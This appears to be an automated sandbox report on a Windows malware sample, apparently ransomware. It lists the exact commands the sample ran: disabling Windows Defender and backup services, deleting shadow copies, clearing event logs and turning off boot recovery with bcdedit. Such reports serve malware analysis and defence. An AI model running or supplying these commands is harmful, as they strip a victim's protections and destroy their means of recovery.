3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 139 PID 1668 wrote to memory of 2304 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 139 PID 1668 wrote to memory of 3476 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 141 PID 1668 wrote to memory of 3476 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 141 PID 1668 wrote to memory of 1140 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 143 PID 1668 wrote to memory of 1140 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 143 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:836
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:4224
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1844
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:4964
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4164 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:3060
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:3064
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:5012
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_2cb1f" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3356 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_2cb1f" /y3⤵PID:3496
-
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:3888
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:4780
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:2828
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵
- Launches sc.exe
PID:4352
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:4720
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:752
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:2604
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_2cb1f" start= disabled2⤵
- Launches sc.exe
PID:3848
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2320
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1808
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:3272
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:4424
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1944
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2304
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3476
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1140
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:4968
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:4028
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:4856
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1592
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:4704
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:836
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2364
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:4208
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:4792
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1704
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:4460
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1368
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:2908
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:2080
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:2148
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:868
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:4592
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:2436
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:4416
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2796
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2900
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3568
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3832
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:4472
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4200
-
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3964
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4252
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1544
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3572
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1872
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2052
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:4392
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2812
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:4420
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:228
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1208
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1956
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82